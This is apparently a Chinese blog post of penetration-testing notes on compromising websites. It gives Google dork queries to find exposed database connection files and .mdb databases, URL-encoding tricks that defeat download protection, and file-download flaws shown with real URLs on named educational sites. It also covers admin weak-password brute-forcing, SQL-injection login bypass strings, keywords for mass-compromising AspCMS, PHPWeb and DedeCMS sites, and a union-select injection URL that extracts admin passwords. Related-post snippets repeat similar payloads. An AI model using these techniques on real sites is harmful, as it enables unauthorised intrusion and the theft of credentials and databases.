渗透漏洞分析--沙窝李的王

最新推荐文章于 2024-08-03 21:11:12 发布
最新推荐文章于 2024-08-03 21:11:12 发布
阅读量1.1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43600412/article/details/92853136
版权

弱漏洞利用网站

网站暴库漏洞

暴库(常是Access数据库,文件格式:data.mdb;SQLserver、MySQL—>数据库连接文件),就是通过一些技术或者程序漏洞得到数据库的地址,并将数据库非法下载到本地,

hacker非常乐意这种事件的发生,在得到网站数据库之后,就可以得到网站管理员的账号和密码,对网站进行破坏与管理,也能通过数据库的道德网站的隐私信息,甚至是最高权限。(目录遍历漏洞)

利用方法

inurl:/inc/conn.asp

inurl:inc+conn.asp to parent directort intext:

inurl:/inc/conn.asp

inurl:/inc+conn.asp to parent dirctory

所有可以目录浏览的网页都有一些相同的地方,主要有以下几点:

to parent directory

last madifief Description

转到父目录

而利用Google语法来搜索的语句有:

intitle  intext  inurl  site  filetype等

搜索域名后缀,常见的域名后缀有:

com  net  mil  org  info  gov  edu  biz  coop  areo  pro  int  arpa

e.g

intext:to parent directory + intext:mdb site:fudan.edu.cn

inc/conn.asp—>inc%5cconn.asp(MySQL数据库与可能的路径)

暴库绕过、过防下载

#sdsf.mdb

下载时改成 %23sdsf.mdb

#@!$%^&*asfkladsf@!#.mdb

%23@%21%24%25%5E%26%2aasdfkladsf@%21%23.mdb

高级语法暴库

inurl:./… admin …/… add…

inurl:./… admin…/…del…

inurl:/.asp <id=<%<%<%

下载漏洞

http://ipo.snnu.edu.cn/

http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/201206122041778.doc

http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc

http://www.sxzzy.cn/ggis/news/down.asp?FileName=doc/2101-5/2012053010329973.doc

下载漏洞利用

通过蜘蛛爬行,找到该URL,下载conn.asp  config.php  config.asp  db.mdb

网站后台密码爆破(弱口令 bp)

为了方便管理网站,cms系统畅游管理员后台管理接口,输入账号密码登录进行管理

常见后台

网站常见的cms管理系统有:

织梦  idscuz  帝国  phpweb  WordPress  aspcms  科讯  南方  良精  ecshop等

对应的后台:

dede  admin.php  e/admin  admin.php  wp-admin  admin  admin  admin  admin  admin

还有可能:manager  login_admin  login_manage  login.asp

弱口令猜解

常见弱口令:admin  admin888  admin123  123456等等

逻辑万能秘钥:

asp–> ‘ro’ = ‘or’

php–> admin’ or 1=1==  admin’ or ‘1’='1

破解工具:burpsuite  discuz破解器  py脚本  httpfuzzer(针对带验证码的)

针对性的一些工具:PKav HTTP Fuzzer

将找到的请求包放进去(请求地址,请求包),对密码部分添加标记,对验证码部分添加标记,然后暴力破解。

网站漏洞EXP的利用

EXP是exploit(漏洞利用)的缩写。当我们cms出现漏洞的时候,针对漏洞原理可以写出针对该漏洞的exploit。

有的时候exp可以直接添加管理员或者getshell,爆出管理员账号密码,数据库账号密码。

EXP利用

主流网站基本上都有漏洞和exp

e.g 织梦  phpcms  strusl  phpweb …

EXP收集

百度  交流  利用工具

批量检测站点

常用于某一类型的漏洞站点的安全检测

批量拿站

关键词:

有限公司 – powered by AspCMS v2.0

powered by AspCms 2

powered by AspCms 2.0

AspCms 2.0

powere

关键字:inurl:newgoods.asp:action_key_order=news

利用方法:admin_shopxp/upLoad_bm.asp

漏洞利用:phpweb漏洞

关键字:

inurl:/class/?1.html

inurl:class/index.php?catid=0

inurl:/page/html/?1.html

inurl:news/html/?411.htm

默认后台地址:/admin.php

注入地址:

down/class/index.php?myord=1

news/class/index.php?showtag=

万能密码  admin ‘or ‘1’ =’ 1

织梦批量,搜索关键字:

powered by DedeCMS_V57_UTF8_SP12004-2011 DesDev LNC

inurl:shopxp_news.asp

TEXTBOX2.Asp?action=madify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

沙窝李
关注
渗透测试漏洞类型分析与自动化渗透测试工具介绍
weixin_51337717的博客
04-05 959
渗透测试漏洞类型解析 漏洞分析 按照攻击方法分类 本地攻击(缓冲区溢出): 本地命令执行(应用),本地命令执行(文件),权限提升 远程攻击(缓冲区溢出): 远程代码执行(端口),非授权信息泄露,网络劫持 DDOS攻击: 资源耗尽型,导致异常型 WEBAPP 攻击: 注入(SQL,XXE等),越权访问,XXS,逻辑分析,不安全的反序列化 WEB 漏洞介绍 漏洞 介绍 注入 注入漏洞是一组安全漏洞,当可疑数据作为命令或查询插入到应用程序中时会发生 失效的身份认证 当应用程序的功能未正确实现
CMS漏洞复现小结--沙窝
weixin_43600412的博客
07-19 1001
今天学习了CMS漏洞复现,先搭建好环境了 搭建环境: dedeCMS (CNVD-2018-01221): DeDeCMS官网:http://www.dedecms.com 网站源代码版本:DeDeCMS V5.7 SP2(UTF-8) 网站源码下载:http://www.dedecms.com/products/dedecms/downloads/ 使用phpstudy搭建到本地,细节部分可...
渗透学习 漏洞分析
weixin_46601374的博客
04-01 723
总不能因为这世上有人跟你道不同,你就不好好走自己的路呀 小白入坑学废集7常见的漏洞分析工具NMAP端口扫描之——NMAP主机探测端口扫描扫描端口状态TCP扫描(-sT)SYN扫描(-sS)端口扫描探测目标主机的操作系统密码破解漏洞探测防火墙躲避绕过AWVSAWVS常见功能爬虫功能NetsparkerAppscanJskySafe3WVS椰树BurpsuiteProxySpiderScannerIntruderRepeaterDecoderComparer黑客的迂回“打法”旁站旁站收集常用收集工具漏洞扫描
渗透漏洞分析--沙窝里的
weixin_43600412的博客
06-19 618
漏洞分析有好多工具,我偏爱nmap与burpsuite 上次忘了写nmap专篇博客,恰好补上。 工具:nmap 1.检测开机在网络上的主机(主机发现) 2.检测主机上开放的端口(端口发现或枚举) 3.检测到相应的端口(服务发现) 4.软件版本检测脆弱性的漏洞(Nmap的脚本) nmap常用参数 -sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批的链接请求以及错误信...
渗透测试面经之——渗透测试与漏洞分析
Alexz__的博客
03-22 5568
渗透测试与漏洞分析 owasp top10漏洞 SQL注入 失效的身份认证和会话管理 跨站脚本攻击 XSS 直接引用不安全的对象 安全配置错误 敏感信息泄露 缺少功能级的访问控制 跨站请求伪造 CSRF 使用含有已知漏洞的组件 未验证...
渗透测试流程(二) 威胁建模、漏洞分析漏洞利用阶段
ShouYWang的博客
02-17 1260
本篇文章将介绍渗透测试中最为精彩的渗透利用阶段
web安全--沙窝
weixin_43600412的博客
07-16 260
request请求 X-F获取的真实IP一般是不真实的 Web题 aaencode 文字编码-un Dirsearch扫描工具-kali里有,比起御剑,耗CPU小,扫描出来的的结果,蓝色的部分是绕不过去的,扫描出robot.txt,可以直接访问 robots协议 robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Notepad,就可以创建和编辑它[1...
CTF杂项小结--沙窝
weixin_43600412的博客
07-17 639
1.流量分析 主要工具是wireshark,需要熟练掌握使用方法,过滤器语法、追踪流、导出文件 wireshark: Wireshark也使用pcap network library来进行封包捕捉。可破解局域网内QQ、邮箱、msn、账号等的密码。 顶栏选项功能: “File"(文件)打开或保存捕获的信息 。“Edit” (编辑)查找或标记封包。进行全局设置。 “View”(查看)设置Wiresha...
汇编语言 源程序2--沙窝
weixin_43600412的博客
05-13 340
接上一篇博客---- 编辑源程序 我们编写汇编程序的时候,可以使用任意的文本编译器来编译源程序,只要最终将其存储为纯文本文件即可。 我使用DOS下的Edit,如下图: (1)进入DOS方式,运行Edit: 在Edit中编辑程序: 将程序保存为文件c:.asm后,退出Edit,结束对源程序的编辑。 编译 对源程序编辑后,得到一个源程序文件从c:\l.asm,对其进行编译,生成包含机器代码的目标文件...
汇编语言 源程序1--沙窝
weixin_43600412的博客
05-08 570
1.一个源程序从写出到执行的过程 第一步:编写汇编源程序。 使用文本编译器(如 Edit.记事本等)用汇编语言编写汇编源程序,产生一个存储源程序的文本文件。 第二步:对源程序进行编译连接。 对源程序进行编译,产生目标文件:再用连接程序对目标文件进行连接,生成在系统中可直接执行的可执行文件。 其中可执行文件包括两部分: (1).程序(汇编指令翻译过来的机器码)和数据(源程序中定义的数据)...
CMS(TWCMS) v2.0.3 20140505
10-24
TWCMS是由中国首家网络营销策划机构通科技推出,免费开源。是国内首家同时推出:高性能轻量级开源框架(KongPHP框架)、高性能轻量级模板引擎、高性能轻量级开源CMS的公司。是国内首款支持亿级负载的轻量级CMS。是国内首款负载能力远超discuz、phpwind等论坛程序的CMS。TWCMS的特点:1:体积小功能强轻量级网站内容管理系统 TWCMS体积小巧,安装包不到1M,简洁精干,没有冗长的代码,没有华丽的视觉效果,没有不必要的功能,我们注重实用性,主程序只做最核心,最实用的功能,当然,不做不代表不能实现,其它的功能可以通过我们强大的插件来实现。2:速度快性能高TWCMS一直追求程序的速度和性能,程序框架采用懒加载、分布式服务器的设计,每张表都可有自己的DB服务器群和CACHE服务器(群),单表都能承受亿级数据,运行速度快,根据官方测试:TWCMS在亿级数据依然在0.0x秒,而在APC的环境,亿级数据在0.00x秒。3:高安全够稳定我们深知安全对于一款CMS的重要性,TWCMS基于自主研发的开源框架KONGPHP开发,安全高效,为进一步保证程序的安全性,我们邀请“乌云漏洞平台”、
3种常见的渗透测试漏洞总结,快来收藏√
测试官
12-07 703
越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广、危害大,被OWASP列为Web应用十大安全隐患的第二名。
墨者学院_CMS系统漏洞分析溯源(第4题)
weixin_50698958的博客
10-10 922
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
aspcms各版本漏洞0day集合
weixin_33889665的博客
11-03 2253
admin/_content/_About/AspCms_AboutEdit.asp?id=19and1=2unionselect1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24fromaspcms_userwhereuserid=1———————————...
WEB攻防-asp安全
worryanswer的博客
08-11 922
web攻防-ASP安全
ASPCMS 漏洞详细教程
2201_75891821的博客
08-03 447
将slideTextStatus的值修改为1%25><%25Eval(Request(chr(65)))25><%25 放包(连接密码是a)然后用工具连接 成功连接。
【原创】风讯DotNetCMS V1.0~V2.0 SQL注入漏洞
weixin_33850890的博客
11-09 589
  文章作者:rebeyond  注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到乌云-漏洞报告平台。I.S.T.O版权所有,转载需注明作者。  受影响版本:貌似都受影响。  漏洞文件:user/City_ajax.aspx  漏洞分析:这个页面里的getCityList函数,通过用户传入的CityId参数来进行省份和城市查询。请求,都没有进行权限的验证,游客权限就可以调用其中...
aspcms cookies欺骗和后台无验证注入
qq_38807738的博客
06-23 3286
后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗!————————后台注射———————— http://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname...
渗透测试漏洞类型解析
weixin_52514668的博客
04-05 3503
渗透测试漏洞类型解析 一、漏洞分类 (1)按照攻击对象分类: 操作系统:Linux. windows. IOS. Andriod 网络设备:路由器 交换机 防火墙 无线网络设备 Web:PHP. ASPX. JSP. HTML. JS. 数据库 … 服务类软件:FTP. SMTP. SSH. POP3. AD. SMB. RDP. 其他自编服务 物联网设备:PLC. RFID. GPS. 基站 打印机 摄像头 智能探测器(手表) (2)按照攻击方法分类 本地攻击(缓冲区溢出):本地命令执行(...
织梦cms 漏洞复现
最新发布
12-11
织梦CMS(DedeCMS)是一款广泛使用的开源内容管理系统(CMS),由于其功能强大和使用便捷,受到了很多网站开发者的青睐。然而,织梦CMS也存在一些安全漏洞,攻击者可以利用这些漏洞对网站进行攻击。以下是织梦CMS常见漏洞的复现过程: ### 1. SQL注入漏洞 #### 漏洞描述 SQL注入是一种常见的攻击方式,攻击者通过在输入框中输入恶意的SQL语句,从而获取数据库中的敏感信息。 #### 复现步骤 1. **找到注入点**:在织梦CMS中,常见的注入点包括搜索功能、文章ID等。 2. **构造注入语句**:例如,假设文章ID为`1`,可以尝试在URL中加入注入语句: ``` http://www.example.com/plus/view.php?aid=1 and 1=1 ``` 如果页面正常显示,说明存在SQL注入漏洞。 3. **获取数据库信息**:通过构造不同的SQL语句,可以逐步获取数据库的表名、字段名等信息。 ### 2. 文件上传漏洞 #### 漏洞描述 文件上传漏洞是指攻击者通过上传恶意文件(如脚本文件)来获取服务器的控制权。 #### 复现步骤 1. **找到上传点**:在织梦CMS中,常见的上传点包括头像上传、附件上传等。 2. **构造恶意文件**:例如,构造一个包含PHP代码的图片文件: ```php <?php phpinfo(); ?> ``` 3. **上传文件**:将恶意文件上传到服务器。 4. **访问上传文件**:通过浏览器访问上传的文件URL,如果服务器执行了PHP代码,说明存在文件上传漏洞。 ### 3. XSS漏洞 #### 漏洞描述 跨站脚本攻击(XSS)是指攻击者在网页中插入恶意脚本,从而窃取用户信息或进行其他恶意操作。 #### 复现步骤 1. **找到XSS点**:在织梦CMS中,常见的XSS点包括搜索框、留言板等。 2. **构造XSS语句**:例如,在搜索框中输入以下代码: ``` <script>alert('XSS')</script> ``` 3. **提交查询**:如果页面弹出提示框,说明存在XSS漏洞。 ### 防护措施 1. **及时更新**:及时更新织梦CMS到最新版本,修复已知漏洞2. **输入验证**:对用户输入进行严格验证,防止SQL注入和XSS攻击。 3. **文件验证**:对上传的文件进行严格验证,防止文件上传漏洞。 4. **安全配置**:配置Web服务器的安全选项,如禁用不必要的服务和功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值